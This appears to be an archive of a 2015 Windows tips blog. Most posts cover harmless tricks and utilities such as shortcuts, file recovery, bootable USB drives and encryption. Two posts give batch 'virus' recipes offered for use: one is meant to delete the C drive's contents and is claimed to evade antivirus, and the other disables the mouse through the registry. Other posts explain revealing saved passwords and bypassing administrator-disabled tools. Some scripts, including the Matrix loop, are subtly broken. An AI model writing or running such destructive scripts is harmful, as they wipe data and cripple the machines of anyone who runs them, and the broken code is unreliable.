Saturday, October 10, 2015

Enable God Mode [Windows Trick]

God Mode is a hidden folder that makes available a range of handy customization for your PC. By enabling God Mode/Control Box you can access all your windows setting from one location. God Mode works on 32 as well as 64 bit operating system. So lets enable God mode on your computer.


1. On your desktop right click and create a New Folder.

2. Rename this folder to the code given below.


3. Done, Now double click on this folder and you will have access to all operating system settings at one place. 

Tested working on Windows8/8.1, Windows 10

Friday, October 9, 2015

Create Nameless Folder [Windwos Trick]

Today I will show you a simple windows trick. Basically you can not make folder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows operating system.

Before attempting this trick, try to make a folder with no name and you will fail to do so.

Steps : 

1. Make a New Folder where ever you want.

2. Click on Folder and Press F2 ( Function Key : Shortcut for Rename)

3. Erase the text showing "New Folder".

4. Now keep Pressing Alt (i.e alter key) type 0160. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.

5. After that leave alt key and Press enter.

6. Done you just created nameless folder.

Note : Number keys below function keys will not work for this trick. Numbers from NUM pad is valid only.

Thursday, October 8, 2015

Make Drive Data Delete Virus in Minute

Today we will see how to make drive data deleting virus using a batch codes. No software is required to make this virus, Notepad is enough. No Anti Virus can detect this virus.

How to Make the virus ? 

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
   2. Save this file as DDDVirus.bat (Name can be anything but .bat extension is must)

   3. Now, running this file will delete all the content of C Drive.


1. Please don't try to run on your own computer or else it will delete all the data of your C Drive. I will not be responsible for any damage done to your computer.

2. This virus will delete the C Drive completely.

Wednesday, October 7, 2015

Make Your Virus to Disable Mouse

Today we will make a batch virus, whose task is to Disable mouse so think before executing.

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

  2. Save this file as  mousedisable.bat

  3. Done you just created your virus.

*Warning : Executing this on your machine will disable mouse as well.

Tuesday, October 6, 2015

4 Most Common Password Cracking Methods

Hackers use many methods to hack your account or get your personal data. Today I will share 4 Most commonly used methods used to crack password and some solution to get secured.

1. Brute Force Attack

Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Solution : Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers and special characters like @#$& etc. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iforgot" or "yourpassword" can be cracked easily whereas computer will take years to crack passwords like "aN@42lL00"

2. Social Engineering

Social engineering is process of making someone to trust you and get information from them. For example, Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Solution : If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Phishing

Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Solution : Phishing attacks are very easy to avoid. The URL of this phishing pages are different from the real one.
Example : URL of phishing page of facebook might look like (As you can see "e" is missing). Always make sure that websites URL is correct.

4. Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Solution : Don't use your name, surname, phone number or birth-date as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

Monday, October 5, 2015

Use Web Browser as Text Editor [Browser Trick]

Today I come up with a simple trick to use web browser as a simple text editor like Notepad.

Works on all web browsers

1. Copy below code in browser Url Section .

data:text/html, <html contenteditable>

2. Now Press Enter.

3. Now you can type anything as would do on any other text editor like Notepad.

4. To save your text file Press Ctrl + S and save it as anything.txt (.txt  is important)

Sunday, October 4, 2015

Save Web Page To PDF [Chrome]

Today I come up with a simple trick/browser feature that let you convert any web page into PDF file format, which might help you to read your favourite articles offline.

1. Open the Google Chrome Browser on your PC.
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P to open the the Print dialog on Chrome Browser.
4. Now Change the destination to “Save As PDF” and hit the save button.

5. The current web page will instantly be downloaded as a PDF document.

Saturday, October 3, 2015

Open Banned Websites With Proxy Sites

There are many sites which are blocked by government because of breaking laws of their country. People download many software to open these sites but end up being infected by malware, virus. Today i will share a trick with you which can help you easily open banned sites without downloading anything.

Visit List of Proxy

How To Open Banned Site ? 

1. Open any proxy site from list.

2. Enter the URL of the site which you want to open like below.

3. click the Go button and enjoy.

Friday, October 2, 2015

Enabling Command Prompt disabled by Administrator or Virus [Trick: Windows]

If you run the command prompt (cmd.exe), and getting error saying "The command prompt has been disabled by your Administrator". Then it is blocked by Administrator or could be virus infection.

There are ways using which you can re-enable it.

Using the Group Policy Editor

1) Click on Start. Go to Run. Users running Widndows 10, Windows 8/8.1, Windows 7 or Vista, go to Search.
2) Type gpedit.msc and press Enter.
3) Navigate to User Configuration/ Administrative Templates / System.
4) In the work area on the right side, double click on "Prevent access to the command prompt".
5) In the popup dialog, encircle Disabled and click OK.
6) You should be able to immediately use the command prompt. If you still cannot access it, restart your computer.

*Home editions of Windows do not contain the Group Policy Editor.

Using Registry Editor

Registry Editor is an in-built tool in Windows. You can use it to easily enable the command prompt by simply modifying a registry key. To do so, follow these steps.

1) Users running Windows 10, Windows 8/8.1, Windows 7 and Windows Vista, go to Start>Search. Users of Windows XP, got to Start>Run.
2) Type regedit and press Enter.
3) Registry Editor will start. If it is disabled, you will need to enable Registry Editor first.
4) Navigate to HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System. If the Windows key is not there, you will need to create a new key called Windows. Also, if the System key is not there, you will need to create it.
5) In the work area on right side, double click on DisableCMD and set its value to 0. If you cannot locate DisableCMD, you will need to create a new DWORD value called DisableCMD and set its value to 0.
6) Close the Registry Editor.

The command prompt should immediately be accessible. If it isn't, restart your computer.

The methods mentioned works on Windows 10, Windows 8/8.1, Windows 7, Windows Vista and Windows XP.

Thursday, October 1, 2015

View Passwords hidden under Asterisks/Stars [Trick]

Most browsers offer the capability of remembering usernames and passwords. Most of us use this feature to automatically save our usernames and passwords in order to log in more quickly. What if you forget the saved username and password?

As web browsers hide passwords using stars/asterisks/dots there is no way in which a user can recover his password by simply looking at what browser shows. Here are some tips and tricks that you can use to reveal your password for a website when you have forgotten but your browser remembered.

Use Developer Options to show password

Open the website for which your browser has the saved password, then right click on the password box and click Inspect Element.

A code like this would be displayed:-

<input type="password" class="inputtext" name="pass" id="pass">

Change the type from password to text so that the code looks like:-

<input type="text" class="inputtext" name="pass" id="pass">

Your password would be immediately visible.

Mozilla Firefox Add-on

Show My Password is a Firefox Add-on which automatically converts hidden passwords into human readable form. To use this add-on, just open the webpage with the hidden password and click in the field containing the hidden password. This add-on will automatically reveal the password to you.

Software to reveal hidden passwords behind stars

There are free software that you can use to recover forgotten passwords. Some of them are:-

Password Viewer:Password Viewer by IT Samples is another application that can be used to unmask passwords hidden behind stars. It allows you to view passwords not only in web browsers but also in any program.

Asterisk Logger:Asterisk Logger from Nirsoft is one such software. It automatically displays the hidden password whenever a window containing a hidden password is detected.

Note : These tools are browser independent. These software will not be able to show User Account Control /Windows logon password.

Wednesday, September 30, 2015

Destroy Your Confidential Data to Unrecoverable Level

Every business has some documents that need to be kept confidential. They can be anything from financial records to sensitive personal information to national data. Sometimes data needs to be destroyed because there is no physical or digital space to store it, and it cannot be thrown away in a random place. Here are some ways in which anyone can dispose confidential data.

Confidential Paper Documents

The simplest way to destroy confidential paper documents is to put them through a shredder. All confidential files can be shredded with little or no effort. Depending on how confidential your data is, you can choose the right kind of shredding process. Shredding services will also shred your documents for you, at a fee. If you are an individual and cannot afford a shredder , you can burn the paperwork in a safe place to destroy them completely.

Confidential Data on Your Computer

If you use computer, you would have important data and files on it which you might not prefer others to have a look at.
Q. What is the best method of getting rid of your confidential data so that no one can access it?
Most of us think that the delete key (or shift+delete combination) will help to get rid of these from the system forever, but that is not exactly the truth. Any file that has been deleted from the hard disk can be retrieved by anyone, who knows how to recover deleted documents.

Erasing the Hard Drive

Erasing hard drive clean all data, This is one of the ways in which you can remove the confidential information. There are programs that overwrite storage with random data so that the original files cannot be retrieved. You can also try Guttmann Method, in which the files are overwritten 35 times. CDs, Hard Drives and other disks must be destroyed to prevent information from being accessed.

 Hard Drive Shredding

Programs that erase files and write over them can make your files nearly impossible to retrieve. However, in some cases, it is still possible that data is recovered by an expert. To avoid this, the hard drive can be shredded entirely. CDs and drives can be destroyed by breaking and drilling holes. The greater the number of holes you drill in the drive, the less likely it is that the data can be retrieved, even by an expert.

All memory chips, hard drives and other similar devices can be shredded by a digital shredder, which destroyed devices completely. This makes it impossible to recover any information from the drive.

Tuesday, September 29, 2015

Matrix Code Effect [Notepad-CMD Tricks]

Have you watched “The Matrix”? Of course, you have. You can make matrix type running codes just by using notepad and Command Prompt. Just copy and paste the code given below in Notepad and save the file as "a.bat" or *.bat.

@echo off
color 02
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto loop

Upon running the bat file, you will see the Matrix type code effect.

Monday, September 28, 2015

Convert Videos using VLC Media Player

VLC is free and open source media player, great at playing media of many formats. Also It can be used to easily convert videos from one format to other. Converting videos with VLC media player is fast. It can also be used to resize videos from one size to other for when you need to shrink videos to fit in your mobile devices. It can also used as video cutting tool.

Convert Videos with VLC Media Player

To convert videos with VLC media player, follow the steps given below:-

1) Open VLC media player.
2) Click on Media in the Menu bar.
3) In the dropdown menu, click on Convert/Save. Alternatively, you can press Ctrl+R to directly reach media options.

4) Click on the Add button on the right of the File selection box to load the video whose format you want to change.
5) In the following dialog box, click on browse to select the destination where your converted video will be.

6) In the profile selection option, select from a pre-configured profile of the output or customize it by clicking on the Settings icon on its right. You can select from a range of encapsulation, video and audio formats in the following dialog box if you wish to customize the output.
7) Click on Start to begin conversion.
8) VLC's progress bar will show progress. Do not close the player when it is converting videos as it will result in output video getting corrupted.

Sunday, September 27, 2015

Check if someone is hacking your computer/ Trace a Hacker

Do you want to know if someone is hacking your computer?

Command Prompt can help you to find if someone you don't know is connected to your computer stealing private data. Just execute netstat -a and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).

These tricks work on Windows 10, Windows 8/8.1, Windows 7, Windows Vista, Windows XP and all previous versions of Windows.

Saturday, September 26, 2015

Enabling Task Manager disabled by Administrator or Virus [Trick: Windows]

Windows Task Manager is used to view details about processes running on your computer. It can be used to terminate programs that are misbehaving. Most spyware and viruses disable it to prevent themselves from being closed through it. Some administrators also disable Task Manager to prevent other users from closing important security programs like antiviruses and anti-malwares.

In such situations, running the Task Manager will give the "Task Manager has been disabled by Administrator" error. However, there are some tricks you can use to re-enable task manager and close those harmful programs manually.

Enable Task Manager from Registry in Windows10, Windows 8/8.1, 7, XP or Vista

Registry Editor can be used to modify registry keys which tell Windows how it should work. A simple registry modification can be used to bypass the Task Manager block. To do so, just follow the steps:-
  1. Click on Start. Go to Run. If you use Windows 10, Windows 8/8.1, Windows 7 or Windows Vista, go to Search.
  2. Type regedit and press Enter. Registry Editor will start. If Registry Editor is also disabled, you will first need to enable registry editing.
  3. Through the left hand navigation pane, navigate to HKEY_CURRENT_USER\Software\Microsoft\ Windows\ Current Version\Policies\System. If the System key is not there, you will need to create it.
  4. In the work area, locate "DisableTaskMgr". If this value is not there, you will need to create a new DWORD value called DisableTaskMgr. Double click on it. A window will pop up.
  5. Enter its value data as 0 and press OK.
  6. Close Registry Editor.
  7. If Task Manager is still disabled, restart your PC.

Enable Task Manager from the Group Policy Editor (Gpedit.msc)

Group Policy Editor is a feature in Windows which is used to edit local policy settings. It can also be used to enable Task Manager. To do so, just follow the steps given below:-
  1. Open Start Menu. Windows XP users click on Run. Windows 10, Windows 8/8.1, Windows 7 and Vista users, go to Search.
  2. Type gpedit.msc and press Enter. Group Policy Editor Window will show up.
  3. From the navigational pane at the left hand side, go to: User Configuration>Administrative Templates>System>Ctrl+Alt+Del Options.
  4. In the work area, double click on "Remove Task Manager" and set its value to Disabled or Not Configured.
  5. Restart your Computer or Log Off and Log back On to apply the changes.
Note : Group Policy Editor is not available on home editions of Windows.

Enable Task Manager by Running a CMD Command

Command Prompt can also be used to directly enable Task Manager.
  1. Open Notepad.
  2. Copy the code given below and paste it.
  3. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System  /v  DisableTaskMgr  /t REG_DWORD  /d /0 /f
  4. Save the File as TaskManager.bat.
  5. Run TaskManager.bat as Administrator if you use Windwos10, Windows 8/8.1, Windows 7 or Windows Vista. In Windows XP, simply open the file. A command prompt window will flash for a second and then disappear indicating successful execution.
  6. If Task Manager is still not available, restart your PC.
The tricks mentioned will work on Windows 10, Windows 8/8.1, Windows 7, Windows XP and Windows Vista

Friday, September 25, 2015

Enabling Registry Editor disabled by Administrator or Virus [Trick: Windows]

Registry Editor is a useful utility in Windows which allows users to easily change advanced Windows settings by altering registry keys present in a hierarchical arrangement called the Windows Registry. Being such a powerful tool, Registry Editor is not totally error-proof.

A simple virus infection can make it useless or administrator has actually disabled Registry Editing. When you try to open the Registry Editor in one such computer, you are likely to receive the“Registry editing has been disabled by your administrator” error. Due to this, it is impossible to remove this restriction using the Registry Editor.

Re-enable Registry editing in a computer running Windows XP, Windows Vista, Windows Server 2003/ 2008, Windows 7,, Windows 8/8.1 or Windows 10

Enable Registry Editor using the Group Policy Editor

  1. Click on Start. Go to Run. Users running Windows 10, Windows 8/8.1, Windows 7 or Vista, go to Search.
  2. Type gpedit.msc and press Enter.
  3. Navigate to User Configuration/ Administrative Templates / System.
  4. In the work area, double click on "Prevent Access to registry editing tools".
  5. In the popup window, click Disabled and click on OK.
  6. Registry Editor will be immediately accessible. If it's not, restart your PC. 
Note : Group Policy Editor is not available on home editions of Windows.

Enable Regedit by simply running a CMD Command

  1. Open Notepad.
  2. Copy the code given below and paste it.
  3. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
  4. Save the file as RegisteryEnabler.bat. Run this file as Administrator if you use Windows10, Windows 8/8.1, Windows 7 or Windows Vista. In Windows XP, simply open the file. CMD will flash for a second and then disappear. This indicates successful execution.
  5. Log Off and Log Back On.

Thursday, September 24, 2015

Recover Deleted files : Recuva

Have you ever deleted a file that you did not wish to and wanted to recover it but did not find it in the recycle bin? You probably deleted it permanently with Shift+Delete or emptied the Recycle Bin. Now what? Don't worry, you may still have a chance to get it back.

Q. But how do the software undelete deleted files?

When files are deleted, Windows does not delete them from your hard disk. It marks the storage space as empty for new data to be written and deletes the index entry that tells the location of those files. Unless, new files are written on that space, the deleted files are still recoverable. That's what allows these software to recover deleted files.
Recuva [Free version available]

Recuva offers a wizard based interface to unerase files. Recuva offers scanning deleted files based on their type (music, pictures, videos etc.). It also allows deep scanning in case a file you deleted is unrecoverable via normal search. Recuva offers securely deleting files. Recuva also has a portable version that you can keep in your flash drive.

This recovery software support recovery from memory sticks, digital camera cards and MP3 players. This also support undeleting all types of pictures, software, movies and documents from both FAT and NTFS formatted drives. This tool work on Windows 10, Windows 8/8.1, Windows 7, Windows Vista and Windows XP.

Some important tips to increase the chances of getting your deleted files back:-

1) When a file is deleted accidentally on a storage device, make sure that you don't do anything on it as doing that would increase the chances of new data being written over your deleted files, which would make file recovery impossible.

2) If you have deleted files on your main computer (the one you are using right now), do not use it. Keep it running and go to another computer, download Recuva . Then plugin the flash drive in your current system and perform file recovery.

3) If one software fails to recover your deleted file, it does not mean that another one wouldn't recover it too.

Wednesday, September 23, 2015

Turn Windows PC into WiFi Hotspot [Connectify]

Wi-Fi Hotspot Using Connectify

If you want to setup a Wi-Fi hotspot with numerous options and a nice interface, Connectify has a great application called Hotspot that lets you create a hotspot from your internet connection. With Pro version you can even make your PC a Wi-Fi repeater or a wired router.
Connectify Hotspot is great if your ISP charges per device, Its excellent if you don’t want to pay more to connect more devices.

 Just download Free/Pro version, both version allow to create hotspot.

*Connectify supports Windows 10/8.1/8/7

Download Connectify

After installation, Now time to setup your WiFi hotspot. Follow these steps :

1: On the ‘Settings Tab’ click on the ‘Wi-Fi Hotspot’ button.

 2: In the ‘Internet to Share’ dropdown select the adapter you wish to share. This adapter should have a working connection to the Internet.

3: Give your hotspot a name (SSID) and password. The hotspot name is the network name that other devices will see and authenticate to using your unique hotspot password.

4: Then click the ‘Start Hotspot’ button to begin sharing your Internet connection with your WiFi enabled devices.

Editing PDF Files : Basic editing [PDFescape]

PDF or Portable Document Format is one of the most popular format for document sharing. Its popularity is mainly because PDF files are multi-platform, smaller in size, can be opened on most devices with free software and are difficult to edit as they are "read only".

Also PDF files being "read only" by default, there are certain tools and software you can use to change the contents of a PDF file for free without use of any paid software like Adobe Acrobat.

Edit PDF Files Online

If you are looking for basic PDF editing (changing bits of text to hide your personal information or simply filling a form), you can try PDFEscape to edit PDF files right in your browser. It allows you to modify text, images and add annotations with the help of custom shapes and arrows. One of PDF Escape's great feature is its ability to password protect PDF files. It also allows you to hide text with its white out tool (this is different from deleting it). It even lets you edit password protected PDF files and add hyperlinks to web addresses.

Important : To use PDF Escape, you need a JavaScript enabled web browser.

Tuesday, September 22, 2015

Change File format FAT32 to NTFS Without Formatting

If you have a flash drive or an external hard drive that currently has FAT32 file system and you want to change it to NTFS, because FAT32 does not support handling large files (over 4GB) but there is just one problem, you don't want to lose your saved data.
Then this is right place for you, You can achieve seamless transition from FAT to NTFS without involving any data loss.
There are many software's that support File Format conversion but the Convert command is one of the easiest ways to do so. Follow the steps below to know how:-

Important: While this method works perfectly, I would still advise you to backup your data in case  anything goes wrong.


FAT 32 to NTFS Conversion Steps :


1) Go to Computer, and note the name of the drive whose file system you wish to convert.
2) Click on Start.
3) Type cmd in the search bar if you use Windows 7, Windows 8/8.1, Windows 10 or Windows Vista. If you use Windows XP, click on Run and then execute cmd.
4) Execute "chkdsk d: /f " (without quotes) where d is the letter of the drive to undergo conversion. This checks the drive for errors and fixes them automatically.
5) Execute "Convert d: /FS:NTFS" (without quotes). d is again the letter of the drive to be converted.
6) The command prompt will start the conversion process and after a few minutes, CMD will say that conversion was successful.
7) You can check it in the properties of the drive through right click<Properties.

This command can also be used to convert FAT16 disks and works on Windows 8/8.1, Windows 10, Windows 7, Windows XP and Windows Vista.
Important : This method cannot be used to reconvert NTFS file system back to FAT32. To reconvert back to FAT32, you will need to format the entire drive which will definitely cause data loss.

Disable USB ports on Windows PC [Registry Method]

This trick allows you to disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives.

To use this trick to disable USB ports, follow the steps given below:-
  1. Click on Start.
  2. Click on Run. If you cannot find RUN, type it in the search box.
  3. Type "regedit" without quotes. This will launch the Registry Editor.
  4. Navigate to  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
  5. In the work area, double click on Start.
  6. In the Value Data box, enter 4.
  7. Click on OK.
  8. Close Registry Editor and refresh your desktop.
  9. To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.

Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows XP, Windows Vista, Windows 7 and Windows 8/8.1, Windows 10.

Note: This trick also disables access to your USB connected peripheral devices. So, do not use it if you have USB connected keyboard and mouse.
Values of [Start] key: Value 3 is for Enabling Ports & Value 4 is for disabling Ports.

Monday, September 21, 2015

Shutdown Your Computer using Command Prompt

Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A computer running Windows (XP, Vista, 7, 8 or 8.1, 10) with the command prompt working perfectly, i.e. not disabled by a virus.

Initial Steps
1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do to your machine.

Shutdown Your Computer
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Computer
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Hibernate a Your Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this from control panel.

Shutdown your computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages.

Stop a System Shutdown
Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

Sunday, September 20, 2015

Change Processor Name Permanently [Tweak]

If you are bored of your old processor name and want a new one then its the right article for you :P.
It is very easy to change your processor name permanently by creating a registry key and placing a shortcut to it in the Windows start up folder. To do so, just follow the steps given below:-

Steps :-

1.  Open Notepad.

2.  Copy and paste the exact code given below:- 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] "ProcessorNameString"="MyCPU(R) Jaadu(R) @ 9.00GHz

To change the processor name, edit the part of the code given in green. Also understand that \0 in the above code should only be present if Windows store your processor name at that location. Open the Registry Editor and navigate to the above mentioned keys to check whether or not to include the \0.
3.  Click on File Menu, click on Save As and select "All Files" in the Save as Type option. Save the file as namechange.reg or *.reg.

4.  Create a new shortcut on your desktop. Enter regedit / S "Location of the .reg file" as the location of the item. For example, enter regedit /S "C:\namechange.reg" if your registry file is located in the root of C:\ drive.

5. Copy the created Shortcut file.

6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) or to C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista. Also remember that AppData is a hidden folder.)  if C: is your System drive.

7.  Paste the copied file.

This registry file would now execute each time when Windows starts and the Processor Name String would be modified each time.

Keyboard Shortcuts for Windows PC

While most of us are already aware of obvious keyboard shortcuts like “Alt+F4” and “Ctrl+C”, there are many shortcuts. Keyboard shortcuts if used properly could save a lot of time and effort.

Windows key+D: This shortcut is the keyboard equivalent of “Show the Desktop”. It is useful for quickly minimizing every open window when someone walks in and you are doing some private work.

Ctrl+Shift+Esc: This shortcut directly starts the task manager. While Alt+Ctrl+Del was used to bring out the Task Manager in Windows XP and earlier versions, in Windows 10, Windows 8.1, Windows 8 and Windows 7, it just brings up the lock this computer screen.

Ctrl+Click: This shortcut is useful for opening a link in a background tab. This is useful when you have to load a page without leaving the current one.

Alt+Print Screen: takes the screenshot of the current active window as opposed to just Print Screen which takes the screenshot of the entire screen.

Shift+Click for Yes to All and No to All: If you have a lot of dialog boxes asking yes and no question, just shift+click Yes or No on one to yes all or no all.

Ctrl+C on an error dialog box to copy its contents: Suppose your computer is giving an error message and you want to copy its contents to send to the support guy, what do you do? Just press Ctrl+C while the dialog box is highlighted and its contents will be copied to your clipboard.

Ctrl+T: This keyboard shortcut opens a new tab in internet browsers.

Ctrl+Shift+T: Reopens the last closed tab.

Alt+Enter after writing the domain name in the address bar of your browser to insert .com automatically.

Shift+Enter inserts .net domain name extension.

Ctrl+W: This shortcut closes the current tab in your browser quickly.

Windows key+M: Minimizes all the open windows.

Ctrl+L: This shortcut allows you to quickly jump to the address bar of your web browser.

Windows key+Pause/Break: Quickly open the system properties dialog box.

Ctrl+Shift+Delete: This shortcut opens the option to delete your browser's history, cookies, cache and other details that it stores while you browse the internet. This shortcut is extremely useful for the privacy conscious.

Windows Key+L: This shortcut locks your computer.

Ctrl+H: makes the history appear.

CTRL+B: Bold

CTRL+U: Underline

CTRL+I: Italic.

Alt+Tab: Useful for quickly cycling between running applications. Press along with Shift to cycle backwards.

Ctrl+Tab: Cycle between tabs in your browser.

Ctrl+F5: Clears the cache and refreshes the current tab.

Shift+Right click: Open alternate right click options.

Alt+Double click: Open the file's properties. Alt+Enter can also be used for this.

Alt+Select: This shortcut allows you to select rectangular blocks of text in Word processors, something that is not possible with simple select.

F2: Allows you to rename the selected file.

Holding Shift while inserting a device with removable storage prevents automatic run.

Ctrl+F: This keyboard shortcut opens the Find option in any program.

Ctrl+S: If you are working on a software and want to quickly save your progress, this shortcut will come in handy.

Ctrl+Home and Ctrl+End: Useful for quickly going to the top and bottom of a page.

Ctrl+P: Useful for printing the current page.

Space Bar: While viewing a web page in a browser, pressing space bar moves the page down.

These are some keyboard shortcuts that I fond useful. If you know some more useful keyboard shortcuts, do mention them in the comments.

Create Bootable USB Drives to Install (Almost) Any OS : Rufus

Rufus is small in size (nearly 600 KB) and claims to be faster at creating bootable USB drives than most applications of its type. Rufus is also portable which means that you need not install this software to use it. Just double click on the executable file and the application will start working. Rufus also allows you to add fixes to use your bootable flash drives on older computers having BIOSs which do not support booting from them.

However, Rufus can only create bootable flash drives from ISOs meaning you need to have an ISO image of the CD or DVD of the OS of your choice.

I do not think this should be too much of a problem considering how easy it is to create ISOs from DVDs and CDs.

How to use Rufus?

1) When you start Rufus, the first option that you will see is Device:. It contains all your connected USB drives. If you plug in a USB drive after starting Rufus, the drive you have connected will shortly be available here.

2) You will not need to modify the Partition Scheme and target system type, as the default choice is suitable for making the USB drive work on both UEFI and legacy BIOS computers.

Rufus on WIndows 10

3) Change the file system from FAT32 to NTFS from the dropdown menu. This is the file system with which your USB drive will be formatted with. Do note that older computers will not boot from a flash drive formatted as NTFS. Do not modify the cluster size. Enter the name you want for your USB device in the Volume label box.

4) Check the Create a bootable disk using checkbox if it is not already checked. In the dropdown menu next to it, select ISO image. Click on the button right to it to locate your ISO image.

Do note that Rufus will format your USB drive deleting everything on it before making it bootable. So, make sure that it does not contain any important data.

5) Click on Start to format your USB drive and extract all files of the ISO to it.

To install the OS, restart your computer and select your USB device as the primary boot option in the BIOS boot menu.

Rufus works on all the latest versions of Windows and can be used to extract the following ISOs to a bootable USB drive:-

Arch Linux, Archbang, BartPE/pebuilder, CentOS, Damn Small Linux, Fedora, FreeDOS, Gentoo, GParted, gNewSense, Hiren's Boot CD, noppix, KolibriOS, Kubuntu , Linux Mint, OpenSUSE , ReactOS, rEFInd, Slackware, Tails, Trinity Rescue Kit, Ubuntu, Ultimate Boot CD, Windows XP (SP2, SP3), Windows Server 2003 R2, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 and many more.

Encrypt Files or Folders in Windows: Free

With hackers becoming more and more sophisticated, most of us are worried about the safety of personal data. There are many options available to protect data but none comes close to encryption in terms of safety offered. There are easy to use methods that allow to encrypt important files and folders in Windows.

Encrypting files in Windows using the Encrypting Files System (EFS)

Windows offers an inbuilt encryption method called EFS to protect sensitive data from unwanted users. EFS can be used only on hard drives formatted as NTFS and on professional and premium editions of Windows 10, Windows 8.1, Windows 8, Windows Vista or Windows XP. Home editions of Windows do not support this.

To encrypt files with EFS, follow these steps:-
  1. Right click on the file or folder you want to protect and click on Properties at the bottom of the menu.
  2. This will bring up the Properties window. In this window under the General tab, click on Advanced.
  3. In the Advanced attributes window, tick on Encrypt contents to secure data option.
  4. Click OK and Apply.
If the file is encrypted successfully, its name will generally be visible in green font.

If you encrypt files and folders with EFS, it would not change how you access those files and folders. You would still be able to read, modify and delete those files as long as you are logged into the user account that encrypted those files. However, other users from would not be able to do this. For example, if you carry the encrypted file in a flash drive, you would not be able to access it from other computers. To access it from other computers, you will need your encryption key.

Important : 
Make sure that you backup your encryption key when Windows prompts you to do so. It will be required in case you want to access the encrypted files from a different user account or from a different computer.

To back up your encryption key, click on the Back up now option in the pop up that comes when you first encrypt a file or folder. Then, click Next on the window titled Certificate Export Wizard. Enter a password for your certificate (make sure it is tough but also easy to remember), choose a location to save it, give it a name and click Finish.

In case Windows does not prompt you to back up your encryption key, you can back it up from the File Encryption Certificates manager. Since, EFS relies on your user account to give access to protected files, it is important to choose a strong password for your Windows user account.

EFS is relatively quick and hassle free but not totally secure as Windows stores an unencrypted version of protected files in the temporary folder (when you access them) which can be easily accessed by any experienced computer user. To overcome this weakness, ensure that you clean up your temporary files with the Disk Cleanup utility every time you access your protected files.